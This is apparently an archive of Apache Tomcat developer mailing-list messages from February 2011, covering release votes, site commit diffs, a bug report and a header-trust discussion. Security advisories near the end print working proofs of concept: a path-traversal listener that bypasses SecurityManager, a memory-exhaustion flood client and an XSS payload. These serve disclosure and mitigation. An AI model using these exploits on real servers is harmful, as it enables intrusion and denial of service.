Re: [VOTE] Release build 6.0.32
On 02/02/2011 12:37 PM, jean-frederic clere wrote: [X] Stable - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.8
On 02/04/2011 02:52 PM, Mark Thomas wrote: The proposed Apache Tomcat 7.0.8 release is now available for voting. [X] Stable - go ahead and release as 7.0.8 Stable Regards -- ^TM - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.8
2011/2/4 Mark Thomas ma...@apache.org: The proposed Apache Tomcat 7.0.8 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ The proposed 7.0.8 release is: [x] Stable - go ahead and release as 7.0.8 Stable Best regards, Konstantin Kolinko - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: RemoteIpValve advices
On Jan 31, 2011, at 3:57 PM, Mark Thomas wrote: On 31/01/2011 21:54, Henri Gomez wrote: Not necessarily. The closest immediate proxy is the last entry in that list. You might not trust all of the machines in that proxy chain to provide legitimate IP details. In my case, x-forwarded-for: 1.2.3.4, 10.122.47.36, 1.2.3.4 was my browser IP and 10.122.47.36 EC2 IP. the Valve is not activated by default and should only be used in Amazon Load Balancing case. mod_remoteip has the concept of trusted vs. untrusted proxies, where only the trusted ones will be allowed to present the next-immediate-left IP address as a legitimate proxy address, and that IP is then compared to the trust list. So you might trust yahoo or google's proxy servers, but not your typically pwned user PC which is relaying spam or being employed as a DDoS agent. x-forwarded-server: domU-12-31-38-00-B2-08.compute-1.internal is a trusted server, aka EC2 box. So +1 to have this on RemoteIpFilter/Valve, an uniq filter/valve to handle such cases. Mark to you need code contribution on RemoteIp Valve ? Patches to RemoteIpFilter/Valve are the place to start. The issue of trusted proxies are already handled so the patches should be able to take advantage of that. I'm a bit slow catching up and picking up on this thread, but I want to make sure that we are very careful with who we trust and what we do with regards to the X-Forwarded-* headers. As they are just ad-hoc (non-)standards, there is very different behavior out there in the wild WRT proxies. In general (at least in my experience), the only header that is fairly well supported is X-Forwarded-For. All of the others are a crapshoot. For example, say that a request goes through 3 proxies, A, B, and C. If they all behave relatively well, we will get an `X-Forwarded-For: A, B, C'. We trust B and C, so we will get a remote IP of A in TC. Now, we also get `X-Forwarded-Proto: https', `X-Forwarded-Host: foo', etc. Now where did these come from? I have personally never seen a proxy that will append comma-separated values to any of these other headers (e.g. `X-Forwarded-Proto: https, http, http'), and even if they did, they could easily be forged. If anything is done with these, you had better be certain -- without a shadow of a doubt -- that these values can be trusted. That is, if you are only getting a single value for X-Forwarded-(Port|Proto|Host|Server|...), you need to be sure it was set by your last trusted proxy. What does this mean from a TC perspective? Without an official standard for X-Forwarded-*, we need to be cautious about what we do with these headers. Even the handling we currently do with X-Forwarded-Proto and setting the port and scheme is dubious. Having the options to handle additional headers is good, but they should have to be explicitly enabled. As for me, one of the first things I do when traffic hits my perimeter boxes is to strip off all X-Forwarded-* headers. That way when I use them internally, I know they can be trusted. - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067289 - /tomcat/tc5.5.x/trunk/STATUS.txt
Author: pero
Date: Fri Feb 4 21:17:44 2011
New Revision: 1067289
URL: http://svn.apache.org/viewvc?rev=1067289view=rev
Log:
add my vote
Modified:
tomcat/tc5.5.x/trunk/STATUS.txt
Modified: tomcat/tc5.5.x/trunk/STATUS.txt
URL:
http://svn.apache.org/viewvc/tomcat/tc5.5.x/trunk/STATUS.txt?rev=1067289r1=1067288r2=1067289view=diff
==
--- tomcat/tc5.5.x/trunk/STATUS.txt (original)
+++ tomcat/tc5.5.x/trunk/STATUS.txt Fri Feb 4 21:17:44 2011
@@ -37,7 +37,7 @@ PATCHES PROPOSED TO BACKPORT:
svn delete
connectors/util/java/org/apache/tomcat/util/net/jsse/JSSE13SocketFactory.java
2)
http://people.apache.org/~kkolinko/patches/2010-03-06_tc55_remove_JSSE13Factory_v2.patch
- +1: kkolinko, markt
+ +1: kkolinko, markt, pero
-O: jim
-1:
@@ -45,7 +45,7 @@ PATCHES PROPOSED TO BACKPORT:
Use JVM provided solutions to CVE-2009-3555 if available (i.e. RFC 5746
support)
http://svn.apache.org/viewvc?rev=1065859view=rev
- +1: markt, kkolinko
+ +1: markt, kkolinko, pero
-1:
kkolinko:
1) s/for (String cipher : ciphers){/for (int i=0;
iciphers.length;i++){String cipher=ciphers[i];/
@@ -58,5 +58,5 @@ PATCHES PROPOSED TO BACKPORT:
to allow more fine-grained control over which functionality is accessible,
like it was done in Tomcat 6.
http://people.apache.org/~kkolinko/patches/2011-02-03_tc55_roles.patch
- +1: kkolinko
+ +1: kkolinko, pero
-1:
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.8
+1 Peter Am 04.02.2011 um 14:52 schrieb Mark Thomas: The proposed Apache Tomcat 7.0.8 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ The proposed 7.0.8 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.8 Alpha [ ] Beta - go ahead and release as 7.0.8 Beta [x ] Stable - go ahead and release as 7.0.8 Stable Cheers, Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
Re: [VOTE] Release Apache Tomcat 7.0.8
On 04/02/2011 13:52, Mark Thomas wrote: The proposed Apache Tomcat 7.0.8 release is now available for voting. It can be obtained from: http://people.apache.org/~markt/dev/tomcat-7/v7.0.8/ The svn tag is: http://svn.apache.org/repos/asf/tomcat/tc7.0.x/tags/TOMCAT_7_0_8/ The proposed 7.0.8 release is: [ ] Broken - do not release [ ] Alpha - go ahead and release as 7.0.8 Alpha [ ] Beta - go ahead and release as 7.0.8 Beta [ ] Stable - go ahead and release as 7.0.8 Stable With 4 binding votes for stable, this vote passes. I'll kick off the process now and announce (probably tomorrow) once the mirrors catch up. Mark - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067369 [2/2] - in /tomcat/site/trunk: docs/ xdocs/
Modified: tomcat/site/trunk/xdocs/whichversion.xml URL: http://svn.apache.org/viewvc/tomcat/site/trunk/xdocs/whichversion.xml?rev=1067369r1=1067368r2=1067369view=diff == --- tomcat/site/trunk/xdocs/whichversion.xml (original) +++ tomcat/site/trunk/xdocs/whichversion.xml Sat Feb 5 01:13:23 2011 @@ -28,7 +28,7 @@ mapping between the specifications and t tr td3.0/2.2/td td7.0.x/td - td7.0.6/td + td7.0.8/td td1.6/td /tr - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
svn commit: r1067370 - in /tomcat/site/trunk: docs/index.html xdocs/index.xml
Author: markt Date: Sat Feb 5 01:21:44 2011 New Revision: 1067370 URL: http://svn.apache.org/viewvc?rev=1067370view=rev Log: Add 7.0.8 to front page Modified: tomcat/site/trunk/docs/index.html tomcat/site/trunk/xdocs/index.xml Modified: tomcat/site/trunk/docs/index.html URL: http://svn.apache.org/viewvc/tomcat/site/trunk/docs/index.html?rev=1067370r1=1067369r2=1067370view=diff == --- tomcat/site/trunk/docs/index.html (original) +++ tomcat/site/trunk/docs/index.html Sat Feb 5 01:21:44 2011 @@ -3,18 +3,18 @@ html head titleApache Tomcat - Welcome!/title -meta content=Apache Tomcat Project name=author / -link rel=stylesheet href=stylesheets/tomcat.css type=text/css / -link media=print rel=stylesheet href=stylesheets/tomcat-printer.css type=text/css / +meta name=author content=Apache Tomcat Project/ +link type=text/css href=stylesheets/tomcat.css rel=stylesheet/ +link type=text/css href=stylesheets/tomcat-printer.css rel=stylesheet media=print/ /head -body vlink=#525D76 alink=#525D76 link=#525D76 text=#00 bgcolor=#ff -table cellspacing=0 width=100% border=0 +body bgcolor=#ff text=#00 link=#525D76 alink=#525D76 vlink=#525D76 +table border=0 width=100% cellspacing=0 !--PAGE HEADER-- tr td !--PROJECT LOGO-- a href=http://tomcat.apache.org/; -img border=0 alt=Tomcat Logo align=left src=./images/tomcat.gif / +img src=./images/tomcat.gif align=left alt=Tomcat Logo border=0/ /a /td td @@ -25,28 +25,28 @@ td !--APACHE LOGO-- a href=http://www.apache.org/; -img border=0 alt=Apache Logo align=right src=http://www.apache.org/images/asf-logo.gif; / +img src=http://www.apache.org/images/asf-logo.gif; align=right alt=Apache Logo border=0/ /a /td /tr /table div class=searchbox noPrint -form method=get action=http://www.google.com/search; -input type=hidden name=sitesearch value=tomcat.apache.org / -input type=text id=query name=q size=25 value=Search the Site / -input type=submit value=Search Site name=Search / +form action=http://www.google.com/search; method=get +input value=tomcat.apache.org name=sitesearch type=hidden/ +input value=Search the Site size=25 name=q id=query type=text/ +input name=Search value=Search Site type=submit/ /form /div -table cellspacing=4 width=100% border=0 +table border=0 width=100% cellspacing=4 !--HEADER SEPARATOR-- tr td colspan=2 -hr size=1 noshade= / +hr noshade= size=1/ /td /tr tr !--LEFT SIDE NAVIGATION-- -td class=noPrint nowrap=true valign=top width=20% +td width=20% valign=top nowrap=true class=noPrint p strongApache Tomcat/strong /p @@ -178,11 +178,11 @@ /ul /td !--RIGHT SIDE MAIN BODY-- -td id=mainBody align=left valign=top width=80% -table width=100% cellpadding=2 cellspacing=0 border=0 +td width=80% valign=top align=left id=mainBody +table border=0 cellspacing=0 cellpadding=2 width=100% tr td bgcolor=#525D76 -font face=arial,helvetica,sanserif color=#ff +font color=#ff face=arial,helvetica,sanserif a name=Apache Tomcat !--()-- /a @@ -224,25 +224,25 @@ project logo are trademarks of the Apach /tr tr td -br / +br/ /td /tr /table -table width=100% cellpadding=2 cellspacing=0 border=0 +table border=0 cellspacing=0 cellpadding=2 width=100% tr td bgcolor=#525D76 -font face=arial,helvetica,sanserif color=#ff -a name=Tomcat 7.0.6 Released +font color=#ff face=arial,helvetica,sanserif +a name=Tomcat 7.0.8 Released !--()-- /a -a name=Tomcat_7.0.6_Released -strongTomcat 7.0.6 Released/strong +a name=Tomcat_7.0.8_Released +strongTomcat 7.0.8 Released/strong /a /font /td -td bgcolor=#525D76 align=right -font face=arial,helvetica.sanserif color=#ff -strong2011-01-14/strong +td align=right bgcolor=#525D76 +font color=#ff face=arial,helvetica.sanserif +strong2011-02-05/strong /font /td /tr @@ -251,14 +251,13 @@ project logo are trademarks of the Apach p blockquote p -The Apache Tomcat Project is proud to announce the release of version 7.0.6 of -Apache Tomcat. This is the first stable release of the Tomcat 7 branch. This -release contains a number of bug fixes, further performance improvements in -session management and several enhancements to the memory leak detection and -prevention features./p +The Apache Tomcat Project is proud to announce the release of version 7.0.8 of +Apache Tomcat. This release includes security and bug fixes over Apache Tomcat +7.0.6./p + p align=center a href=download-70.cgiDownload/a | -a href=tomcat-7.0-doc/changelog.htmlChangeLog for 7.0.6/a +a href=tomcat-7.0-doc/changelog.htmlChangeLog for 7.0.8/a /p /blockquote /p @@ -266,14 +265,14 @@ prevention features./p /tr tr td -br / +br/ /td /tr /table -table width=100% cellpadding=2 cellspacing=0 border=0 +table border=0 cellspacing=0 cellpadding=2 width=100% tr td bgcolor=#525D76 -font face=arial,helvetica,sanserif color=#ff +font color=#ff face=arial,helvetica,sanserif a name=Tomcat 6.0.32 Released
DO NOT REPLY [Bug 50721] New: RequestUtil.URLDecode() throws IllegalArgumentException for URLs with %xx-Code as last character
https://issues.apache.org/bugzilla/show_bug.cgi?id=50721
Summary: RequestUtil.URLDecode() throws
IllegalArgumentException for URLs with %xx-Code as
last character
Product: Tomcat 7
Version: trunk
Platform: All
OS/Version: All
Status: NEW
Severity: normal
Priority: P2
Component: Catalina
AssignedTo: dev@tomcat.apache.org
ReportedBy: m...@zhaw.ch
When calling org.apache.catalina.util.RequestUtil.URLDecode() for a valid URL
ending with a %xx-Code, the method throws the IllegalArgumentException The %
character must be followed by two hexademical digits.
This only happens, if the %xx-Code is at the at the end of the URL. It works
fine for URLs ending with normal characters.
Example:
RequestUtil.URLDecode(http://localhost:8080/webdav/test%C3%A4;, UTF8) fails
RequestUtil.URLDecode(http://localhost:8080/webdav/test%C3%A4n;, UTF8) works
fine
The problem is with the the test in line 329 (added in revision: 905073):
if (ix + 2 = len) {
Because the index ix is already incremented in line 325, after reading the
current byte b (e.g. the %-character), this test fails if %A4 is at the end,
but does not fail for %A4n.
Simple fix: In line 329 the '=' should be replaced by a '':
if (ix + 2 len) {
This change should have no side effects, because ix is checked again before the
next iteration.
Because this change is trivial I did not include a patch.
Best regards
Christof
--
Configure bugmail: https://issues.apache.org/bugzilla/userprefs.cgi?tab=email
--- You are receiving this mail because: ---
You are the assignee for the bug.
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
[ANN] Apache Tomcat 7.0.8 released
The Apache Tomcat team announces the immediate availability of Apache Tomcat 7.0.8 Apache Tomcat 7.0.8 is primarily a security and bug fix release with numerous fixes compared to 7.0.6. Please refer to the change log for the list of changes: http://tomcat.apache.org/tomcat-7.0-doc/changelog.html Note that this version has 4 zip binaries: a generic one and three bundled with Tomcat native binaries for Windows operating systems running on different CPU architectures. Downloads: http://tomcat.apache.org/download-70.cgi Migration guide from Apache Tomcat 5.5.x and 6.0.x: http://tomcat.apache.org/migration.html Thank you, -- The Apache Tomcat Team - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
[SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- Tomcat 7.0.0 to 7.0.3
- Tomcat 6.0.0 to 6.0.?
- Tomcat 5.5.0 to 5.5.?
- Earlier, unsupported versions may also be affected
Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.
Example (AL2 licensed):
Listener source
---
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
public final class FooListener implements ServletContextListener {
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
java.io.File workdir = (java.io.File) context
.getAttribute(javax.servlet.context.tempdir);
if (workdir.toString().indexOf(..) 0) {
context.setAttribute(javax.servlet.context.tempdir,
new java.io.File(workdir, ../../../../conf));
}
}
public void contextDestroyed(ServletContextEvent event) {
}
}
web.xml snippet
---
listener
listener-classlisteners.FooListener/listener-class
/listener
Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to a Tomcat version where this issue is fixed
- Undeploy all web applications from untrusted sources
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
[SECURITY] CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2010-3718 Apache Tomcat Local bypass of security manger file permissions
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.3
- - Tomcat 6.0.0 to 6.0.?
- - Tomcat 5.5.0 to 5.5.?
- - Earlier, unsupported versions may also be affected
Description:
When running under a SecurityManager, access to the file system is
limited but web applications are granted read/write permissions to the
work directory. This directory is used for a variety of temporary files
such as the intermediate files generated when compiling JSPs to Servlets.
The location of the work directory is specified by a ServletContect
attribute that is meant to be read-only to web applications. However,
due to a coding error, the read-only setting was not applied. Therefore
a malicious web application may modify the attribute before Tomcat
applies the file permissions. This can be used to grant read/write
permissions to any area on the file system which a malicious web
application may then take advantage of.
This vulnerability is only applicable when hosting web applications from
untrusted sources such as shared hosting environments.
Example (AL2 licensed):
Listener source
- ---
package listeners;
import javax.servlet.ServletContext;
import javax.servlet.ServletContextEvent;
import javax.servlet.ServletContextListener;
public final class FooListener implements ServletContextListener {
public void contextInitialized(ServletContextEvent event) {
ServletContext context = event.getServletContext();
java.io.File workdir = (java.io.File) context
.getAttribute(javax.servlet.context.tempdir);
if (workdir.toString().indexOf(..) 0) {
context.setAttribute(javax.servlet.context.tempdir,
new java.io.File(workdir, ../../../../conf));
}
}
public void contextDestroyed(ServletContextEvent event) {
}
}
web.xml snippet
- ---
listener
listener-classlisteners.FooListener/listener-class
/listener
Mitigation:
Users of affected versions should apply one of the following mitigations:
- - Upgrade to a Tomcat version where this issue is fixed
- - Undeploy all web applications from untrusted sources
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBXAAoJEBDAHFovYFnnkQkQAIpE68EHXYnu70xHFThPVGPk
48OIvAA2fMzF8RajaGQRkOS3WXrzPdbjf8AXjUmZ/E3Yr+4XdP2kmDMGsW9hs/Vw
x2fXYfyBQQQMdKVnSVr3cMSPs+RhnSpPI1wsQUWnp0xZNez/9VkSDeINq8JFGXLB
5NgkQZ4+6UBBl2K/mtkVxZHnXi1y9ulvhaQ95jCTt7mzOUJrlq8NXWaEW1njtGAO
7Z6KBMn6PQkzx1k38TG6kPBN331fWWE2WhSimMkX1Q8jfI5f0PVPaQELPKieSf7x
G0zCfQ8aH0q4Kn0jsvvmP43mzCz3PbBwOpFZgPO0vcA5usXwFXGTJCKAhhCTy0CG
q9Sjxb8hLyEwg0vIrvzzlPj6g8mm6syW7Db4R4F3vW/ovCWgVdRFMhl0e/KX3nfG
MWSYq/x4wFj470/j5Ak7wz2y/GAiX9LiEwhFlEWL/SOevY9/u3l9dXIUbcYUG3mS
4dBpthU5eJc2vbdp+gtAPoJexxS9nZhCfbcNjV5HbdRHhn1dIaJhR3KYnqQU2wX2
CG2srHqTJ+3aW969nhHxgpiLmElmDlWHMNQmDDDaY9CDC2i3ZNdw4uBes4nRc7Xg
/1LQvx7pSnAidrQa6CcOjsf4usBQ6faO0zeuri9l6jwFDfwHiL/TuNzNxgmbR8BC
DgZJ/zI6FepuWKA4CV7t
=uz7D
-END PGP SIGNATURE-
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
[SECURITY] Oracle JVM bug causes denial of service in Apache Tomcat
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 The original report is [1]. Tomcat is affected when accessing a form based security constrained page or any page that calls javax.servlet.ServletRequest.getLocale() or javax.servlet.ServletRequest.getLocales(). Work-arounds have been implemented in the following versions: - - 7.0.8 (released) - - 6.0.32 (released) - - 5.5.33 (released expected Monday 7 Feb 2011) All users are recommended to upgrade to a Tomcat version with the work-around. Users unable to upgrade can filter malicious requests via a Servlet filter, an httpd re-write rule (if Tomcat is behind an httpd reverse proxy) or other filtering as available. Accept-Language headers that are compliant with RFC 2616 can not trigger this bug. Therefore, filtering out all request with non-compliant headers will provide protection against the DOS vulnerability. The Apache Tomcat Security Team [1] http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNTLBnAAoJEBDAHFovYFnnk0IQAOB6xo9/wEqckNzq/MUxfxH8 c131gJ0XcMktGZ7x7A2/SgG/oIfl5B4q78EujtPwHsy8XS9XRKCdJtOz8Ak67zb7 z6UhB+ha2R0fgzJoesZeBiHyH4vymB8izF9npnDuFv+Gij7K08mu5bERMCNNQftc +/0a7I2QD/K5YoqkYW/1RLwWhrbAXmjE8ysmnTtgfemRxmGL971bx8+9+l9JmGpm unP+yVYpKNnGXNUSNuL9C0oka2iCzkrPW0UplZyyMsB2iiuKetYESL9KR1rEvxA6 OL4FmS0OxzyPO0UwXFd6qJxc6L2BaWLdhyu7Qp/WnWDFsPDdGa7J87i4WeMsNb2D GYk+9TNV4S2QOCK1dFuARvCY74QykuthBEUHmCJUOT5fUt3NtGXjMTvBTWZUGIbg Eqe5nfGxLB2ZcimWoYUKoYJe31/DY8lBFVPl4KVIUlcQ0RLjnE7JqbSey8ZrHZ4o FY9ZA74ndDUjEaJpwgRVHN6FO7Sts+wDPATYZVvO3lPb0pzwGTBFPAcSiysqbiJT njwUBWfz5e7cpXpHvCPyh0PGY6giHticXplhKsq9M/ZK1G6ZzFXbBwlACUfLGFK7 Pt4af26arAlcoapJ0PG8AXGPZLztzLVR1jaNBJ9900gIZ/OI5cmZ9n23l0viTtEf v/8kgZ+3uv6vRb3+wrXH =oxMp -END PGP SIGNATURE- - To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org For additional commands, e-mail: dev-h...@tomcat.apache.org
[SECURITY] CVE-2011-0534 Apache Tomcat DoS vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2011-0534 Apache Tomcat DoS vulnerability
Severity: Important
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.6
- - Tomcat 6.0.0 to 6.0.30
Description:
Tomcat did not enforce the maxHttpHeaderSize limit while parsing the
request line in the NIO HTTP connector. A specially crafted request
could trigger an DoS via an OutOfMemoryError.
Example (AL2 licensed):
package bug50631;
import java.io.OutputStream;
import java.net.InetSocketAddress;
import java.net.Socket;
import java.net.SocketAddress;
public class FloodClient1 {
static final int k_step = 10;
static byte[] value = new byte[k_step * 1024];
public static void main(String[] args) throws Exception {
int i = 0;
while (i value.length) {
value[i++] = 13;
}
SocketAddress addr = new InetSocketAddress(localhost, 8080);
Socket socket = new Socket();
socket.setSoTimeout(0);
socket.connect(addr, 0);
OutputStream os = socket.getOutputStream();
// InputStream is = socket.getInputStream();
int k = k_step;
int m = 0;
int k100 = 100;
while (m 2000) {
if (k = k100) {
k100 += 100;
System.out.print('.');
System.out.flush();
}
if (k = 1024) {
m++;
k -= 1024;
k100 = 100;
System.out.println( + m + Mb);
}
os.write(value);
os.flush();
Thread.sleep(1);
k+=k_step;
}
}
}
Mitigation:
Users of affected versions should apply one of the following mitigations
- - Upgrade to a Tomcat version where this issue is fixed
- - Use a BIO or AJP HTTP connector in place of an NIO HTTP connector
Credit:
The issue was identified by the Tomcat security team.
References:
https://issues.apache.org/bugzilla/show_bug.cgi?id=50631
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLBxAAoJEBDAHFovYFnnVFsQAIE5bU+2aJccXjnlYkEZAr4S
aXmHOCqTOzaW5ob3hPhpFmOwZx3Miabx9fJPRGnCb8CEihz00soYbMcTRHbgDqXA
d/bXMr4xjZF80AM/cWng0vmDbgnLbhVUkGwNqLtuU2rjyxfnRNKBkc0CDIoDQ1FV
zkm5uW9DYTpCmcRo13IhCPanY1DRA/+QiUxriofeUPuz6skiUuyBiY95GDQNOvSo
GofEJt39DBnPDb2kzonkQTERo2OgSIPDgLeas3/pawHGsQXaBH3dwOsRQESExJS+
kT5xuhUuqynWNGXnimG0x8yCDe7+SujiAmSjTSrblBIanOtIt3SxjSe9+SasSQih
jNO/M87aQ/znmlIlVeS4F+OFuWSuBUB+GjpZn1L77pG+/yWiHurhUuAXM2borB9c
I45c2yuYstki7ej9buHXpy5l4d6A28FT61V6E2sENM9RMMHFY7cUJmorbsBf1qj2
ei+h9QEcNiwg/on0apg9pU+B1PCZxGR7G/8aMCXFfkri4opeAXy7ZpJfk+k2zI64
S8edezROjZxgztqZKydpFn2MrQ9tUmoioZHUEiZqAuPVfszXvUdLZsSFh+7A6+4D
jL+T7jIt9wsCxsZJ1+8X03nEkD7Yop+kHvUmMjyM4XEKLReI+PoXfYBrNou7Nhvm
niulExg4qtuJplCbEw8k
=06CU
-END PGP SIGNATURE-
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
[SECURITY] CVE-2011-0013 Apache Tomcat Manager XSS vulnerability
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
CVE-2011-0013 Apache Tomcat Manager XSS vulnerability
Severity: Low
Vendor: The Apache Software Foundation
Versions Affected:
- - Tomcat 7.0.0 to 7.0.5
- - Tomcat 6.0.0 to 6.0.29
- - Tomcat 5.5.0 to 5.5.31
- - Earlier, unsupported versions may also be affected
Description:
The HTML Manager interface displayed web applciation provided data, such
as display names, without filtering. A malicious web application could
trigger script execution by an administartive user when viewing the
manager pages.
Example:
display-namelt;scriptgt;alert('hi');lt;/scriptgt;/display-name
Mitigation:
Users of affected versions should apply one of the following mitigations:
- - Upgrade to a Tomcat version where this issue is fixed
- - Undeploy untrusted web applications
- - Remove the Manager application
Credit:
The issue was identified by the Tomcat security team.
References:
http://tomcat.apache.org/security.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html
http://tomcat.apache.org/security-5.html
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQIcBAEBAgAGBQJNTLB+AAoJEBDAHFovYFnnul0P/iupVkfHFjgIN5rkDHVoArfU
MkIcm5GMCqb1d0th8JmEtoFlI09sTJdGwyUbiC4hnuj/lA+BJuW/wDSzM2esfXGX
okraVm1SI6eI5DceQf/QzPZ9FIq3Z8mqixzBX959aQY1+JnW3Ah4vIYvZpaKpyi+
BMIj0JtIVEVNajAnUYQn9ruZg9FFX+t1Ajb6n+CJV3D4ux7XMGLFv2y5XPwVwJXm
AP/0jAHoMbjaRMwHrUxgkIDMpwpOcHFIfFq7zHjo9OTtL2LJ+vrB3FlxV6rZygMt
gwPeDeUoCCphrf1UncUzckW280/WGfsr3xncNEOpCG3o6xQkRV8eoGNikw5xZ2U8
YxLr4RdpJemUhx94jDYiMdT/gYyHbMfHtVsG3VObFp2yEjnLHU7HI6tI3C617nau
Czg1Z/YqnUvZfGDQDL5bXkF6dlWav9CmXuXht7gS3yskkYIJPJn0oZhAYweznK+v
Ua3jqNvsVktsGd76UtRh246Js6ie4EYmusZ3LqJQmsbkoPxkcAFuHCkZqVBR37SF
tt9yI7qUAb+022L+EGQkmjfcy0O9e4WKMXwf5ocywSDVAJH2/EuGTY1vAojHqGNO
hM88fdKus3Vfvj4vqzkAH+4LpdpPmK80xl+KxSJMBg+cWYLe6OGYEL7FbdoswcRv
cNZcMy4fbYmWPQkY+miZ
=sDwq
-END PGP SIGNATURE-
-
To unsubscribe, e-mail: dev-unsubscr...@tomcat.apache.org
For additional commands, e-mail: dev-h...@tomcat.apache.org
